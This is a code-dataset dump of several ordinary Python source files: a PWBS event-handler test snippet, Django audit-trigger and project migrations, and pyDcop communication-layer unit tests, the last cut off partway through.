hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
af16e083f971bbc4e21d58523158391bc67070fb
| 7,669
|
py
|
Python
|
pwbs/tests/TTTTTT_test_6.py
|
paip-web/pwbs
|
21622712b6975ab68b7f5d7c1a944fa826ea87ba
|
[
"MIT"
] | 2
|
2020-01-07T16:07:56.000Z
|
2020-02-15T05:57:58.000Z
|
pwbs/tests/TTTTTT_test_6.py
|
paip-web/pwbs
|
21622712b6975ab68b7f5d7c1a944fa826ea87ba
|
[
"MIT"
] | 3
|
2020-07-03T21:28:02.000Z
|
2021-06-25T15:29:18.000Z
|
pwbs/tests/TTTTTT_test_6.py
|
paip-web/pwbs
|
21622712b6975ab68b7f5d7c1a944fa826ea87ba
|
[
"MIT"
] | 1
|
2020-02-15T06:00:08.000Z
|
2020-02-15T06:00:08.000Z
|
"""
This for future test of Event Manager.
For now it's just contain snippets for it.
"""
test(PWBS_EM)
def test(PWBS_EM: PWBSEventManager):
funct = lambda event_name, *args, **kwargs: print("{0}: {1} | {2}".format(event_name, args, kwargs))
# PWBS Event Called in pwbs.__init__.main() when PWBS class is initialized
PWBS_EM.addHandler("pwbs-event--pwbs_class-initialized", funct)
# PWBS Event Called in pwbs.__init__.main() before PWBS.main() is called
PWBS_EM.addHandler("pwbs-event--pwbs_class-before-main", funct)
# PWBS Event Called in pwbs.__init__.main() after PWBS.main() is called (before quit)
PWBS_EM.addHandler("pwbs-event--pwbs_class-after-main", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ after argparser being initialized
PWBS_EM.addHandler("pwbs-event--pwbs_class-argparser-initilized", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ before parser_initializer being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-before-parser_initializer", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ after parser_initializer being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-after-parser_initializer", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.parser_initializer after specialtasks group is created
PWBS_EM.addHandler("pwbs-event--pwbs_class-parser_initializer-specialtasks-groupcreated-start", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.parser_initializer after specialtasks group has added all PWBS special tasks
PWBS_EM.addHandler("pwbs-event--pwbs_class-parser_initializer-specialtasks-groupcreated-end", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.parser_initializer after localconfigtasks group is created
PWBS_EM.addHandler("pwbs-event--pwbs_class-parser_initializer-localconfigtasks-groupcreated", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ before PWBS Config Manager is created
PWBS_EM.addHandler("pwbs-event--pwbs_class-before-configmanager-created", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ after PWBS Config Manager is created
PWBS_EM.addHandler("pwbs-event--pwbs_class-after-configmanager-created", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ in "Try for errors" block if there are errors
PWBS_EM.addHandler("pwbs-event--pwbs_class-configmanager-errored", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.localconfig_parser_initializer at start of function
PWBS_EM.addHandler("pwbs-event--pwbs_class-localconfig_parser_initilizer-started", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.localconfig_parser_initializer on every element in CommandList object from Configuration Manager
PWBS_EM.addHandler("pwbs-event--pwbs_class-localconfig_parser_initilizer-command-listitem", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main before argparser.parse_args()
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-before-parseargs", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main after argparser.parse_args()
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-after-parseargs", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main before special_tasks_interpreter being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-before-specialtaskinterpreter", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main after special_tasks_interpreter being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-after-specialtaskinterpreter", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main before task_runner being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-before-taskinterpreter", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main after task_runner being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-after-taskinterpreter", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main on throwing NotImplmentedError
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-notimplementedfeatureerror", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before verbose Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-verbose", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before debug Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-debug", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before version Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-version", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before log Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-log", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before logfile Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-logfile", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before configfile Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-configfile", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before test_mode Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-test_mode", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before run_tests Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-run_tests", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before verbose Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-verbose", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after debug Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-debug", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after version Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-version", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after log Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-log", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after logfile Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-logfile", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after configfile Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-configfile", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after test_mode Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-test_mode", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after run_tests Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-run_tests", funct)
# PWBS Event Called on start of PWBS
PWBS_EM.addHandler("pwbs-event--start", funct)
# PWBS Event Called on exit of PWBS
PWBS_EM.addHandler("pwbs-event--quit", funct)
# PWBS Event Called in test_runner on start of run_test function
PWBS_EM.addHandler("pwbs-event--test-runner--start-run_test", funct)
# PWBS Event Called in test_runner on run test function
PWBS_EM.addHandler("pwbs-event--test-runner--run-test-function", funct)
# PWBS Event Called in test_runner on end of run_test function
PWBS_EM.addHandler("pwbs-event--test-runner--end-run_test", funct)
# PWBS Event Called in test_runner before test
PWBS_EM.addHandler("pwbs-event--test-runner--before-test", funct)
# PWBS Event Called in test_runner after test
PWBS_EM.addHandler("pwbs-event--test-runner--after-test", funct)
| 78.255102
| 144
| 0.784978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,899
| 0.769201
|
af1703462ef77f78c9cf88e812154fcfc28474a9
| 2,318
|
py
|
Python
|
postgres_audit_triggers/operations.py
|
carta/postgres_audit_triggers
|
fece63c5ad2924ff5e2aeb38d7bbd5bee6e6547c
|
[
"MIT"
] | 23
|
2018-03-26T11:18:03.000Z
|
2020-12-28T05:11:04.000Z
|
postgres_audit_triggers/operations.py
|
carta/postgres_audit_triggers
|
fece63c5ad2924ff5e2aeb38d7bbd5bee6e6547c
|
[
"MIT"
] | 1
|
2019-02-13T23:58:53.000Z
|
2020-07-01T18:16:13.000Z
|
postgres_audit_triggers/operations.py
|
carta/postgres_audit_triggers
|
fece63c5ad2924ff5e2aeb38d7bbd5bee6e6547c
|
[
"MIT"
] | 3
|
2019-03-26T15:50:38.000Z
|
2021-03-05T00:27:53.000Z
|
from django.db.migrations.operations.base import Operation
from django.utils.functional import cached_property
__all__ = (
'AddAuditTrigger',
'RemoveAuditTrigger',
)
class AddAuditTrigger(Operation):
reduces_to_sql = True
reversible = True
option_name = 'audit_trigger'
enabled = True
def __init__(self, model_name):
self.name = model_name
@cached_property
def model_name_lower(self):
return self.name.lower()
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.model_name_lower]
model_state.options[self.option_name] = self.enabled
state.reload_model(app_label, self.model_name_lower, delay=True)
def database_forwards(
self, app_label, schema_editor, from_state, to_state,
):
model = to_state.apps.get_model(app_label, self.name)
table = model._meta.db_table
with schema_editor.connection.cursor() as cursor:
cursor.execute('SELECT to_regclass(\'audit.logged_actions\')')
has_audit = cursor.fetchone()[0]
if has_audit:
schema_editor.execute(
'SELECT audit.audit_table(\'{}\')'.format(table),
)
def database_backwards(
self, app_label, schema_editor, from_state, to_state,
):
model = to_state.apps.get_model(app_label, self.name)
table = model._meta.db_table
schema_editor.execute(
'DROP TRIGGER IF EXISTS audit_trigger_row ON {}'.format(table),
)
schema_editor.execute(
'DROP TRIGGER IF EXISTS audit_trigger_stm ON {}'.format(table),
)
def describe(self):
return 'Add audit triggers on model {}'.format(self.name)
class RemoveAuditTrigger(AddAuditTrigger):
enabled = False
def database_forwards(
self, app_label, schema_editor, from_state, to_state,
):
super().database_backwards(
app_label, schema_editor, from_state, to_state,
)
def database_backwards(
self, app_label, schema_editor, from_state, to_state,
):
super().database_forwards(
app_label, schema_editor, from_state, to_state,
)
def describe(self):
return 'Remove audit triggers on model {}'.format(self.name)
| 30.103896
| 75
| 0.654875
| 2,136
| 0.921484
| 0
| 0
| 81
| 0.034944
| 0
| 0
| 295
| 0.127265
|
af18b963242e252b6522312070b2c7035181de3d
| 3,781
|
py
|
Python
|
aether-ui/aether/ui/api/migrations/0005_project.py
|
eHealthAfrica/aether
|
6845d7eeebd4ae57332f73d74db3617e00032204
|
[
"Apache-2.0"
] | 14
|
2018-08-09T20:57:16.000Z
|
2020-10-11T12:22:18.000Z
|
aether-ui/aether/ui/api/migrations/0005_project.py
|
eHealthAfrica/aether
|
6845d7eeebd4ae57332f73d74db3617e00032204
|
[
"Apache-2.0"
] | 148
|
2018-07-24T10:52:29.000Z
|
2022-02-10T09:06:44.000Z
|
aether-ui/aether/ui/api/migrations/0005_project.py
|
eHealthAfrica/aether
|
6845d7eeebd4ae57332f73d74db3617e00032204
|
[
"Apache-2.0"
] | 6
|
2018-07-25T13:33:10.000Z
|
2019-09-23T03:02:09.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-02-21 09:42
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
import uuid
def migrate_create_projects(apps, schema_editor):
Project = apps.get_model('ui', 'Project')
Pipeline = apps.get_model('ui', 'Pipeline')
# create default project for all pipelines without any (not published yet)
default_project = Project.objects.create(name=settings.DEFAULT_PROJECT_NAME, is_default=True)
for pipeline in Pipeline.objects.all():
pipeline.project = default_project # set the default project
# create project based on pipeline contracts (extract project ID from kernel_refs)
for contract in pipeline.contracts.all():
if contract.kernel_refs and contract.kernel_refs.get('project'):
project_id = contract.kernel_refs.get('project')
project, created = Project.objects.get_or_create(project_id=project_id)
if created:
project.name = pipeline.name
project.save()
pipeline.project = project
break # ASSUMPTION: all contracts are linked to the same project
pipeline.save()
class Migration(migrations.Migration):
dependencies = [
('ui', '0004_rename_mapping_to_mapping_rules'),
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('project_id', models.UUIDField(default=uuid.uuid4, help_text='This ID corresponds to an Aether Kernel project ID.', primary_key=True, serialize=False, verbose_name='project ID')),
('name', models.TextField(blank=True, default='', null=True, verbose_name='name')),
('is_default', models.BooleanField(default=False, editable=False, verbose_name='is the default project?')),
],
options={
'verbose_name': 'project',
'verbose_name_plural': 'projects',
'ordering': ['name'],
'default_related_name': 'projects',
},
),
migrations.AddField(
model_name='pipeline',
name='project',
field=models.ForeignKey(null=True, blank=True, on_delete=django.db.models.deletion.CASCADE, related_name='pipelines', to='ui.Project', verbose_name='project'),
preserve_default=False,
),
migrations.RunPython(
code=migrate_create_projects,
reverse_code=migrations.RunPython.noop,
# The optional elidable argument determines whether or not the operation
# will be removed (elided) when squashing migrations.
elidable=True,
),
migrations.AlterField(
model_name='pipeline',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pipelines', to='ui.Project', verbose_name='project'),
),
migrations.AddIndex(
model_name='pipeline',
index=models.Index(fields=['project', '-modified'], name='ui_pipeline_project_2fab7e_idx'),
),
migrations.AddIndex(
model_name='pipeline',
index=models.Index(fields=['-modified'], name='ui_pipeline_modifie_e896fc_idx'),
),
]
| 41.097826
| 196
| 0.638191
| 2,415
| 0.63872
| 0
| 0
| 0
| 0
| 0
| 0
| 1,017
| 0.268976
|
af190a09ca44bce44b5b0163ba1e2eceb805790a
| 18,922
|
py
|
Python
|
tests/unit/test_infra_communication.py
|
gauthier-emse/pyDcop
|
a51cc3f7d8ef9ee1f863beeca4ad60490862d2ed
|
[
"BSD-3-Clause"
] | 28
|
2018-05-18T10:25:58.000Z
|
2022-03-05T16:24:15.000Z
|
tests/unit/test_infra_communication.py
|
gauthier-emse/pyDcop
|
a51cc3f7d8ef9ee1f863beeca4ad60490862d2ed
|
[
"BSD-3-Clause"
] | 19
|
2018-09-21T21:50:15.000Z
|
2022-02-22T20:23:32.000Z
|
tests/unit/test_infra_communication.py
|
gauthier-emse/pyDcop
|
a51cc3f7d8ef9ee1f863beeca4ad60490862d2ed
|
[
"BSD-3-Clause"
] | 17
|
2018-05-29T19:54:07.000Z
|
2022-02-22T20:14:46.000Z
|
# BSD-3-Clause License
#
# Copyright 2017 Orange
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import unittest
from http.server import HTTPServer
from threading import Thread
from time import sleep
from unittest.mock import MagicMock, create_autospec, call, ANY
import pytest
import requests
from pydcop.infrastructure.communication import Messaging, \
InProcessCommunicationLayer, \
MPCHttpHandler, HttpCommunicationLayer, ComputationMessage, \
UnreachableAgent, MSG_MGT, UnknownAgent, UnknownComputation, MSG_ALGO
from pydcop.infrastructure.computations import Message
from pydcop.infrastructure.discovery import Discovery
def skip_http_tests():
import os
try:
return os.environ['HTTP_TESTS'] == 'NO'
except KeyError:
return False
@pytest.fixture
def local_messaging():
comm = InProcessCommunicationLayer()
comm.discovery = Discovery('a1', 'addr1')
messaging = Messaging('a1', comm)
return messaging
class TestMessaging(object):
def test_messaging_local_msg(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a1')
msg = MagicMock()
local_messaging.post_msg('c1', 'c2', msg)
(src, dest, o_msg, type), t = local_messaging.next_msg()
assert o_msg == msg
assert dest, 'c2'
assert src, 'c1'
def test_retry_when_posting_msg_to_unknown_computation(
self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.post_msg('c1', 'c2', 'a msg')
# c2 is unknown, the message should not be in the queue
full_msg, _ = local_messaging.next_msg()
assert full_msg is None
# Register c2 : the message will now be delivered to the queue
local_messaging.discovery.register_computation('c2', 'a1')
(src, dest, full_msg, type), _ = local_messaging.next_msg()
assert full_msg is 'a msg'
def test_raise_when_posting_msg_from_unknown_computation(
self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a2', 'addr2')
# Attempt to send a message to c2, from c3 which is not hosted locally
with pytest.raises(UnknownComputation):
local_messaging.post_msg('c3', 'c2', 'a msg')
def test_next_message_returns_None_when_no_msg(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
full_msg, _ = local_messaging.next_msg()
assert full_msg is None
def test_msg_to_computation_hosted_on_another_agent(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a2', 'addr2')
local_messaging._comm.send_msg = MagicMock()
msg = MagicMock()
local_messaging.post_msg('c1', 'c2', msg)
# Check that the msg was passed to the communication layer
local_messaging._comm.send_msg.assert_called_with(
'a1', 'a2',
ComputationMessage('c1', 'c2', msg, ANY),
on_error=ANY)
# Check it's not in the local queue
full_msg, _ = local_messaging.next_msg()
assert full_msg is None
def test__metrics_local_msg(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a1')
local_messaging.discovery.register_computation('c3', 'a1')
msg = MagicMock()
msg.size = 42
local_messaging.post_msg('c1', 'c2', msg)
assert local_messaging.count_all_ext_msg == 0
assert local_messaging.size_all_ext_msg == 0
msg2 = MagicMock()
msg2.size = 12
local_messaging.post_msg('c1', 'c3', msg2)
assert local_messaging.count_all_ext_msg == 0
assert local_messaging.size_all_ext_msg == 0
def test__metrics_ext_msg(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a2', 'addr2')
local_messaging.discovery.register_computation('c3', 'a1')
local_messaging._comm.send_msg = MagicMock()
msg = MagicMock()
msg.size = 42
local_messaging.post_msg('c1', 'c2', msg)
assert local_messaging.size_ext_msg['c1'] == 42
assert local_messaging.count_ext_msg['c1'] == 1
assert local_messaging.count_all_ext_msg == 1
assert local_messaging.size_all_ext_msg == 42
msg2, msg3 = MagicMock(), MagicMock()
msg2.size, msg3.size = 12, 5
local_messaging.post_msg('c1', 'c2', msg2)
local_messaging.post_msg('c1', 'c3', msg3)
assert local_messaging.size_ext_msg['c1'] == 12 + 42
assert local_messaging.count_ext_msg['c1'] == 2
assert local_messaging.count_all_ext_msg == 2
assert local_messaging.size_all_ext_msg == 42 + 12
def test_do_not_count_mgt_messages(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a1')
local_messaging._comm.send_msg = MagicMock()
msg = MagicMock()
msg.size = 42
local_messaging.post_msg('c1', 'c2', msg, msg_type=MSG_MGT)
assert local_messaging.count_all_ext_msg == 0
assert local_messaging.size_all_ext_msg == 0
class TestInProcessCommunictionLayer(object):
def test_address(self):
# for in-process, the address is the object it-self
comm1 = InProcessCommunicationLayer()
assert comm1.address == comm1
def test_addresses_are_not_shared_accross_instances(self):
comm1 = InProcessCommunicationLayer()
comm1.discovery = Discovery('a1', 'addr1')
comm2 = InProcessCommunicationLayer()
comm2.discovery = Discovery('a2', 'addr2')
comm1.discovery.register_agent('a1', comm1)
with pytest.raises(UnknownAgent):
comm2.discovery.agent_address('a1')
def test_msg_to_another_agent(self):
comm1 = InProcessCommunicationLayer()
Messaging('a1', comm1)
comm1.discovery = Discovery('a1', comm1)
comm2 = InProcessCommunicationLayer()
Messaging('a2', comm2)
comm2.discovery = Discovery('a2', comm2)
comm2.receive_msg = MagicMock()
comm1.discovery.register_agent('a2', comm2)
full_msg = ('c1', 'c2', 'msg')
comm1.send_msg('a1', 'a2', full_msg)
comm2.receive_msg.assert_called_with('a1', 'a2', full_msg)
def test_received_msg_is_delivered_to_messaging_queue(self):
comm1 = InProcessCommunicationLayer()
Messaging('a1', comm1)
comm1.messaging.post_msg = MagicMock()
comm1.receive_msg('a2', 'a1', ('c2', 'c1', 'msg', MSG_MGT))
comm1.messaging.post_msg.assert_called_with('c2', 'c1', 'msg', 10)
def test_raise_when_sending_to_unknown_agent_fail_default(self):
comm1 = InProcessCommunicationLayer(on_error='fail')
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg', MSG_MGT)
with pytest.raises(UnknownAgent):
comm1.send_msg('a1', 'a2', full_msg)
def test_raise_when_sending_to_unknown_agent_fail_on_send(self):
comm1 = InProcessCommunicationLayer()
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg')
with pytest.raises(UnknownAgent):
comm1.send_msg('a1', 'a2', full_msg, on_error='fail')
def test_ignore_when_sending_to_unknown_agent_ignore_default(self):
comm1 = InProcessCommunicationLayer(on_error='ignore')
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg', MSG_MGT)
assert comm1.send_msg('a1', 'a2', full_msg)
def test_ignore_when_sending_to_unknown_agent_ignore_on_send(self):
comm1 = InProcessCommunicationLayer()
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg')
assert comm1.send_msg('a1', 'a2', full_msg,on_error='ignore')
@pytest.mark.skip
def test_retry_when_sending_to_unknown_agent_retry_default(self):
comm1 = InProcessCommunicationLayer(on_error='retry')
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg')
assert not comm1.send_msg('a1', 'a2', full_msg)
comm2 = create_autospec(InProcessCommunicationLayer)
comm1.discovery.register_agent('a2', comm2)
comm2.receive_msg.assert_called_with('a1', 'a2', full_msg)
comm2.receive_msg.assert_called_with('a1', 'a2', full_msg)
@pytest.mark.skip
def test_retry_when_sending_to_unknown_agent_retry_on_send(self):
comm1 = InProcessCommunicationLayer(None)
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg')
assert not comm1.send_msg('a1', 'a2', full_msg,on_error='retry')
comm2 = create_autospec(InProcessCommunicationLayer)
comm1.discovery.register_agent('a2', comm2)
comm2.receive_msg.assert_called_with('a1', 'a2', full_msg)
@pytest.fixture
def httpd():
server_address = ('127.0.0.1', 8001)
httpd = HTTPServer(server_address, MPCHttpHandler)
httpd.comm = MagicMock()
yield httpd
httpd.shutdown()
httpd.server_close()
class TestHttpHandler(object):
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_http_handler_one_message(self, httpd):
t = Thread(name='http_thread',
target=httpd.serve_forever)
t.start()
requests.post('http://127.0.0.1:8001/test',
json={'key': 'value'},
timeout=0.5)
sleep(0.5)
httpd.comm.on_post_message.assert_called_once_with(
'/test', None, None,
ComputationMessage(
src_comp=None,dest_comp=None,msg={'key': 'value'},
msg_type=MSG_ALGO))
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_http_handler_several_messages(self, httpd):
t = Thread(name='http_thread',
target=httpd.serve_forever)
t.start()
requests.post('http://127.0.0.1:8001/test',
json={'key':'value'},
timeout=0.5)
requests.post('http://127.0.0.1:8001/test2',
headers={'sender-agent': 'zero'},
json={'key':'value2'},
timeout=0.5)
requests.post('http://127.0.0.1:8001/test3',
headers={'sender-agent': 'sender',
'dest-agent': 'dest',
'type': '15'},
json={'key':'value3'},
timeout=0.5)
sleep(0.5)
httpd.comm.on_post_message.assert_has_calls([
call('/test', None, None,
ComputationMessage(src_comp=None,
dest_comp=None,
msg={'key': 'value'},
msg_type=MSG_ALGO)),
call('/test2', 'zero', None,
ComputationMessage(src_comp=None,
dest_comp=None,
msg={'key': 'value2'},
msg_type=MSG_ALGO)),
call('/test3', 'sender', 'dest',
ComputationMessage(src_comp=None,
dest_comp=None,
msg={'key': 'value3'},
msg_type=15)),
])
@pytest.fixture
def http_comms():
comm1 = HttpCommunicationLayer(('127.0.0.1', 10001))
comm1.discovery = Discovery('a1', ('127.0.0.1', 10001))
Messaging('a1', comm1)
comm2 = HttpCommunicationLayer(('127.0.0.1', 10002))
comm2.discovery = Discovery('a2', ('127.0.0.1', 10002))
Messaging('a2', comm2)
comm2.messaging.post_msg = MagicMock()
yield comm1, comm2
comm1.shutdown()
comm2.shutdown()
class TestHttpCommLayer(object):
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_one_message_between_two(self, http_comms):
comm1, comm2 = http_comms
comm1.discovery.register_computation('c2', 'a2', ('127.0.0.1', 10002))
comm2.discovery.register_computation('c1', 'a1', ('127.0.0.1', 10001))
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('test', 'test'), MSG_ALGO))
comm2.messaging.post_msg.assert_called_with(
'c1', 'c2', Message('test','test'), MSG_ALGO)
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_several_messages_between_two(self, http_comms):
comm1, comm2 = http_comms
comm1.discovery.register_computation('c1', 'a2', ('127.0.0.1', 10002))
comm2.discovery.register_computation('c2', 'a1', ('127.0.0.1', 10001))
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('test', 'test1'), MSG_ALGO))
comm1.send_msg\
('a1', 'a2',
ComputationMessage('c1', 'c2', Message('test', 'test2'), MSG_ALGO))
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2',Message('test','test3'), MSG_MGT))
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2',Message('test', 'test4'), MSG_ALGO))
comm2.messaging.post_msg.assert_has_calls([
call('c1', 'c2', Message('test', 'test1'), MSG_ALGO),
call('c1', 'c2', Message('test', 'test2'), MSG_ALGO),
call('c1', 'c2', Message('test', 'test3'), MSG_MGT),
call('c1', 'c2', Message('test', 'test4'), MSG_ALGO),
])
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unknown_computation_fail_mode(self, http_comms):
comm1, comm2 = http_comms
comm1.discovery.register_computation('c2', 'a2', ('127.0.0.1', 10002))
comm2.discovery.register_computation('c1', 'a1', ('127.0.0.1', 10001))
def raise_unknown(*args):
raise UnknownComputation('test')
comm2.messaging.post_msg = MagicMock(side_effect=raise_unknown)
with pytest.raises(UnknownComputation):
comm1.send_msg(
'a1', 'a2',
ComputationMessage('c1', 'c2', Message('a1', 't1'), MSG_ALGO),
on_error='fail')
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_msg_to_unknown_computation_ignore_mode(self, http_comms):
comm1, comm2 = http_comms
